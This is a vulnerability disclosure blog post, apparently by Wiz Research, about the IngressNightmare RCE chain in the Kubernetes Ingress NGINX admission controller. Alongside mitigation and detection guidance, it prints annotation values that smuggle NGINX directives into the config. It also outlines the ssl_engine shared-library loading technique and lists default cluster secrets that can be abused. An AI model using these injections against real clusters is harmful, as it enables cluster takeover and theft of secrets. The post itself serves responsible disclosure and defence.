Wiz Research discovered CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 and CVE-2025-1974, a series of unauthenticated Remote Code Execution vulnerabilities in Ingress NGINX Controller for Kubernetes dubbed #IngressNightmare. Exploitation of these vulnerabilities leads to unauthorized access to all secrets stored across all namespaces in the Kubernetes cluster by attackers, which can result in cluster takeover.
This attack vector has been assigned a CVSS v3.1 base score of 9.8.
In this blog post, we share key learnings from our discovery of IngressNightmare, affecting the admission controller component of Ingress NGINX Controller for Kubernetes. Based on our analysis, about 43% of cloud environments are vulnerable to these vulnerabilities, with our research uncovering over 6,500 clusters, including Fortune 500 companies, that publicly expose vulnerable Kubernetes ingress controllers’ admission controllers to the public internet—putting them at immediate critical risk.
We recommend patching as soon as possible. This blog post details the technical elements of the vulnerability and contains mitigation and detection guidance for defenders.
We would like to thank the Ingress-NGINX maintainers, particularly Marco Ebert, for their help in addressing the IngressNightmare vulnerabilities. Our team worked closely with the Kubernetes maintainers and security teams to ensure this attack surface was fully eliminated before public disclosure. Kubernetes’s blog can be found here, and Amazon and Google Cloud have also published their own advisories.
What is Ingress NGINX Controller for Kubernetes?
Ingress NGINX Controller is one of the most popular ingress controllers available for Kubernetes, and a core Kubernetes project, with over 18,000 stars on GitHub. Using Ingress-NGINX is one of the most common methods for exposing Kubernetes applications externally. As an ingress controller, its job is to accept incoming traffic and route it to the relevant Kubernetes Services, which in turn forwards the traffic to the appropriate Pods, based on a set of rules. Specifically, Ingress NGINX Controller is based on the popular NGINX reverse proxy.
Ingress-NGINX is explicitly highlighted in the Kubernetes documentation as an example Ingress controller that fulfills the prerequisite for using Ingress in Kubernetes. Our research show that over 41% of internet-facing clusters are running Ingress-NGINX.
The Vulnerability
Ingress NGINX deploys an admission controller within its pod, designed to validate incoming ingress objects before they are deployed. By default, admission controllers are accessible over the network without authentication, making them a highly appealing attack vector.
When the Ingress-NGINX admission controller processes an incoming ingress object, it constructs an NGINX configuration from it and then validates it using the NGINX binary. Our team found a vulnerability in this phase that allows injecting an arbitrary NGINX configuration remotely, by sending a malicious ingress object directly to the admission controller through the network.
During the configuration validation phase, the injected NGINX configuration causes the NGINX validator to execute code, allowing remote code execution (RCE) on the Ingress NGINX Controller’s pod.
The admission controller’s elevated privileges and unrestricted network accessibility create a critical escalation path. Exploiting this flaw allows an attacker to execute arbitrary code and access all cluster secrets across namespaces, that could lead to complete cluster takeover.
To be clear, gaining initial access to a cluster's pod network is not as difficult as one might think - containerization on its own is not a strong security boundary, and many applications running on K8s are susceptible to container escape, as we have repeatedly demonstrated in our research of cloud and SaaS applications over the past few years. Additionally, these vulnerabilities pair very well with SSRF vulnerabilities, which are an arguably common occurrence in web applications.
Mitigation & Detection
First, determine if your clusters are using ingress-nginx. In most cases, you can check this by running kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx
with (at least) cluster-scoped read-only permissions.
This vulnerability is fixed in Ingress NGINX Controller version 1.12.1 and 1.11.5. We strongly recommend that cluster admins:
Update to the latest version of Ingress NGINX Controller.
Ensure the admission webhook endpoint is not exposed externally.
You can use this Nuclei template to check for exposed Ingress-NGINX admission controllers.
If you can’t upgrade immediately, consider one of these mitigations:
Enforce strict network policies so only the Kubernetes API Server can access the admission controller.
Temporarily disable the admission controller component of Ingress-NGINX if you cannot upgrade right away.
If you have installed ingress-nginx using Helm, reinstall with
controller.admissionWebhooks.enabled=false
.If you have installed ingress-nginx manually, delete the
ValidatingWebhookConfiguration
calledingress-nginx-admission
and remove the--validating-webhook
argument from theingress-nginx-controller
container’s Deployment or DaemonSet.Remember to re-enable the Validating Admission Controller after you upgrade, because it provides important safeguards for your Ingress configurations.
Wiz customers can use the pre-built query and advisory in the Wiz Threat Center. Wiz also validates for exposed admission controllers using the Wiz Dynamic Scanner. Finally, the Wiz Runtime Sensor detects zero-day vulnerabilities like IngressNightmare, by continuously monitoring ingress traffic, capturing malicious admission review requests in real-time, and flagging anomalous library loads to prevent similar attacks.
CVE-2025-24513 is different in nature from the other vulnerabilities in the IngressNightmare chain, as it does not lead to RCE.
How did we discover IngressNightmare?
Research Motivation
Kubernetes Admission Controllers present an interesting and often overlooked attack surface in a Kubernetes environment. They are triggered by the Kubernetes API server to review and potentially modify or block requests (AdmissionReview) before they are processed, and they often run with relatively high privileges within the cluster. Admission Controllers frequently don't require authentication and essentially function as web servers, introducing an additional internal network-accessible endpoint in the cluster. This architecture allows attackers to access them directly from any pod in the network, significantly increasing the attack surface.
Background on Ingress NGINX Controller for Kubernetes
Ingress NGINX Controller is an ingress implementation that uses NGINX as a reverse proxy and a load balancer. It is one of the most popular ingresses and is a core Kubernetes project.
To bridge between Kubernetes and NGINX configurations, which is a non-Kubernetes-native technology, the controller attempts to translate Kubernetes Ingress objects into NGINX configurations. To ensure the stability of the NGINX server, the controller employs a validating admission webhook that validates the final configuration before applying it.
From an attacker perspective, the admission controller is an unauthenticated HTTP endpoint responsible for complicated operations, and by default runs with a Kubernetes role that allows access to all of the environment’s secrets, making it an appealing research target.
Remote NGINX Configuration Injection
During our review of the Ingress NGINX Admission Controller code, we identified an interesting code path: when it processes incoming AdmissionReview requests, it generates a temporary NGINX configuration file based on a template file and the provided Ingress object. It then tests the validity of the temporary configuration file using the nginx -t
command. We found multiple ways to inject new configuration directives in this code path.
// testTemplate checks if the NGINX configuration inside the byte array is valid
// running the command "nginx -t" using a temporal file.
func (n *NGINXController) testTemplate(cfg []byte) error {
...
tmpfile, err := os.CreateTemp(filepath.Join(os.TempDir(), "nginx"), tempNginxPattern)
...
err = os.WriteFile(tmpfile.Name(), cfg, file.ReadWriteByUser)
...
out, err := n.command.Test(tmpfile.Name())
func (nc NginxCommand) Test(cfg string) ([]byte, error) {
//nolint:gosec // Ignore G204 error
return exec.Command(nc.Binary, "-c", cfg, "-t").CombinedOutput()
}
Typically, only the Kubernetes API server should send these AdmissionReview requests. However, because the Admission Controller lacks authentication, an attacker with minimal network access could craft and send arbitrary AdmissionReview requests from any pod within the cluster.
For our testing, we used kube-review to create admission review requests from Ingress resource manifests, which could then be sent directly to the admission controller via HTTP.
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "732536f0-d97e-4c9b-94bf-768953754aee",
...
"name": "example-app",
"namespace": "default",
"operation": "CREATE",
...
"object": {
"kind": "Ingress",
"apiVersion": "networking.k8s.io/v1",
"metadata": {
"name": "example-app",
"namespace": "default",
...
"annotations": {
"nginx.ingress.kubernetes.io/backend-protocol": "FCGI"
}
},
"spec": {
"ingressClassName": "nginx",
"rules": [
{
"host": "app.example.com",
"http": {
"paths": [
{
"path": "/",
"pathType": "Prefix",
"backend": {
"service": {
"name": "example-service",
"port": {}
}
}
}
]
}
}
]
},
...
}
}
Figure: Example of an Admission Review object
As can be seen above, there are plenty of fields we can control, showing the large attack surface. In this blog post we will look at two vulnerabilities in the annotation parsers that parse the .request.object.annotations
field in the request above. Properties from this field are later included in the NGINX configuration file – which we used to inject arbitrary directives.
CVE-2025-24514 – auth-url Annotation Injection
The authreq parser is responsible for handling authentication-related annotations. The annotation requires an auth-url fields to be set, which includes a URL, and is finally propagated into the configuration file, in this code flow:
func (a authReq) Parse(ing *networking.Ingress) (interface{}, error) {
// Required Parameters
urlString, err := parser.GetStringAnnotation(authReqURLAnnotation, ing, a.annotationConfig.Annotations)
if err != nil {
return nil, err
}
When the temporary configuration is created, $externalAuth.URL—which corresponds to the URL from the auth-url annotation—is incorporated without proper sanitization.
proxy_http_version 1.1;
proxy_set_header Connection "";
set $target {{ changeHostPort $externalAuth.URL $authUpstreamName }};
{{ else }}
proxy_http_version {{ $location.Proxy.ProxyHTTPVersion }};
set $target {{ $externalAuth.URL }};
{{ end }}
This lack of proper sanitization allows an attacker to inject arbitrary NGINX configuration directives, which get evaluated when nginx -t runs.
Consider the following auth-url annotation:
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\ninjection_point"
The final configuration will appear as follows:
...
proxy_http_version 1.1;
set $target http://example.com/#;
injection_point
proxy_pass $target;
...
This vulnerability does not apply to v1.12.0. In this version, Ingress NGINX Controller changed its default security settings to verify all annotations, including auth-url, against strict regex rules.
CVE-2025-1097 – auth-tls-match-cn Annotation Injection
The authtls parser, for its auth-tls-match-cn annotation, uses CommonNameAnnotationValidator to validate the field value:
func CommonNameAnnotationValidator(s string) error {
if !strings.HasPrefix(s, "CN=") {
return fmt.Errorf("value %s is not a valid Common Name annotation: missing prefix 'CN='", s)
}
if _, err := regexp.Compile(s[3:]); err != nil {
return fmt.Errorf("value %s is not a valid regex: %w", s, err)
}
return nil
}
In other words, the auth-tls-match-cn annotation requires:
The value must start with CN=.
All remaining characters must form a valid regular expression.
Similar to the previous injection, $server.CertificateAuth.MatchCN
corresponds to the value of the auth-tls-match-cn
annotation. While tricky, we can still bypass both requirements to inject arbitrary NGINX configurations in this part of the template:
if ( $ssl_client_s_dn !~ {{ $server.CertificateAuth.MatchCN }} ) {
return 403 "client certificate unauthorized";
}
Consider the following auth-tls-match-cn
annotation:
nginx.ingress.kubernetes.io/auth-tls-match-cn: "CN=abc #(\n){}\n }}\nglobal_injection;\n#"
The final configuration will appear as follows:
...
set $proxy_upstream_name "-";
if ( $ssl_client_s_dn !~ CN=abc #(
){} }}
global_injection;
# ) {
return 403 "client certificate unauthorized"; }
...
For the auth-tls-match-cn
annotation value to appear in the configuration, we also need to provide the nginx.ingress.kubernetes.io/auth-tls-secret
annotation, which corresponds to a TLS certificate or keypair secret present in the cluster. Since the service account used by Ingress NGINX has access to all secrets in the cluster, we can specify any secret name from any namespace, provided it matches the required TLS certificate/keypair format. Notably, many managed Kubernetes solutions include such secrets by default. Below is a short list of common secrets that can be leveraged in this type of attack:
kube-system/konnectivity-certs
kube-system/azure-wi-webhook-server-cert
kube-system/aws-load-balancer-webhook-tls
kube-system/hubble-server-certs
kube-system/cilium-ca
calico-system/node-certs
cert-manager/cert-manager-webhook-ca
linkerd/linkerd-policy-validator-k8s-tls
linkerd/linkerd-proxy-injector-k8s-tls
linkerd/linkerd-sp-validator-k8s-tls
CVE-2025-1098 – mirror UID Injection
In the mirror
annotation parser, the following code processes the UID from the ingress object, and inserts it into $location.Mirror.Source
in the temporary NGINX configuration. We control the ing.UID
field, which allows for a new injection point.
Since this injection is in the UID parameter, which is not a Kubernetes annotation, our input does not get sanitized by the annotations’ regex rules. Since our input gets inserted as-is, we can easily escape our context and inject arbitrary NGINX configuration directives.
CVE-2025-1974 - NGINX Configuration Code Execution
The vulnerabilities above allow an attacker to inject arbitrary directives to the NGINX configuration, which will later be tested by nginx -t
. This does not immediately lead to code execution. If we can find a directive that executes arbitrary code in nginx -t
, it will compromise the pod and obtain its highly privileged Kubernetes role. It is important to note that the NGINX configuration is only being tested, and is not being applied, reducing the number of directives we can actually (ab)use.
Initially we tried to use the load_module
directive which can load a shared library from the filesystem. However, it can only be used in the beginning of the NGINX configuration, so when injected, load_module
will fail with the following error message:
There are many usable directives in Ingress NGINX Controller as their NGINX instance is compiled with many additional modules. We found that the ssl_engine
directive, part of the OpenSSL module, can also load shared libraries. This behavior is undocumented. Unlike load_module
, this directive can be used at any point within the configuration file, so it is suitable for our injection’s constraints.
We can now load arbitrary library files during the NGINX configuration testing phase. Our next challenge is: How can we place a shared library on the pod’s filesystem?
Uploading a shared library with NGINX Client Body Buffers
In parallel to the nginx -t
and the admission controller webhook, the pod also runs the NGINX instance itself, listening on port 80 or 443:
When processing requests, NGINX sometimes saves the request body into a temporary file (client body buffering). This happens if the HTTP request body size is greater than a certain threshold, which is by default 8KB. This means that we should theoretically be able to send a large (>8KB) HTTP request, containing our payload in the form of a shared library as the body of the request, and NGINX will temporarily save it to a file on the pod’s filesystem.
Unfortunately, NGINX also removes the file immediately, creating a nearly-impossible race condition. However, NGINX holds an open file descriptor pointing to the file, which is accessible from ProcFS:
To keep the file descriptor open, we can set the Content-Length
header in the request to be larger than the actual content size. NGINX will keep waiting for more data to be sent, which will cause the process to hang, leaving the file-descriptor open for longer.
The only downside to this trick is that we create the file in a different process, so we can’t use /proc/self
to access it. Instead, we will have to guess both the PID and the FD number to find the shared library, but since this is a container with minimal processes, this can be done relatively fast with a few guesses.
From Configuration Injection to RCE
With a reliable file upload to Ingress NGINX Controller’s pod, we can now put it all together to exploit this issue into a full-blown Remote Code Execution.
The exploit works as follows:
Upload our payload in the form of a shared library to the pod by abusing the client-body buffer feature of NGINX
Send an AdmissionReview request to the Ingress NGINX Controller’s admission controller, which contains any one of our directive injections
The directive we inject is the
ssl_engine
directive, which will cause NGINX to load the specified file as a shared libraryWe specify the ProcFS path to the file descriptor of our payload
If everything goes well, our shared library is now loaded, and we execute code remotely
Here is a demo of the exploit in practice:
Conclusions
We are only scratching the surface in reviewing the security of admission controllers. Initially, we were surprised to see that such a large code base is used behind the scenes. In our view, this attack surface should be restricted in a much better way: removing access from pods within the cluster, and never exposing this publicly. We were also surprised by the lack of least-privilege design, as the exploit ended up with privileges to take control of the cluster. During this research, we found other vulnerabilities in Ingress NGINX Controller, and we expect to find more in other admission controllers.
Finally, we learned that nginx -t
should be considered harmful. We would be happy to hear about other cases where nginx -t
processes unsanitized user input in the wild. This should be more clearly highlighted in the NGINX documentation.
Responsible Disclosure Timeline
December 31, 2024 – Wiz Research reported CVE-2025-1974 and CVE-2025-24514 to Kubernetes.
January 2, 2025 – Wiz Research reported CVE-2025-1097 to Kubernetes.
January 3, 2025 – Kubernetes acknowledged the reports.
January 9, 2025 – Kubernetes proposed a fix for CVE-2025-1097.
January 10, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1097.
January 12, 2025 – Kubernetes proposed a fix for CVE-2025-1974.
January 16, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1974.
January 20, 2025 – Kubernetes proposed a fix for CVE-2025-24513.
January 21, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-24513.
January 21, 2025 – Wiz Research reported CVE-2025-1098 to Kubernetes.
February 7, 2025 – Kubernetes released internal patches for the injection vulnerabilities: CVE-2025-1098, CVE-2025-1097, and CVE-2025-24514.
February 20, 2025 – Kubernetes notified Wiz Research that they removed the NGINX configuration validation from the admission controller, resolving CVE-2025-1974.
March 10, 2025 – Kubernetes sent embargo notifications regarding the five vulnerabilities reported by Wiz Research.
March 24, 2025 – Public disclosure.
Stay in touch!
Hi there! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), and Andres Riancho (@andresriancho) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: research@wiz.io.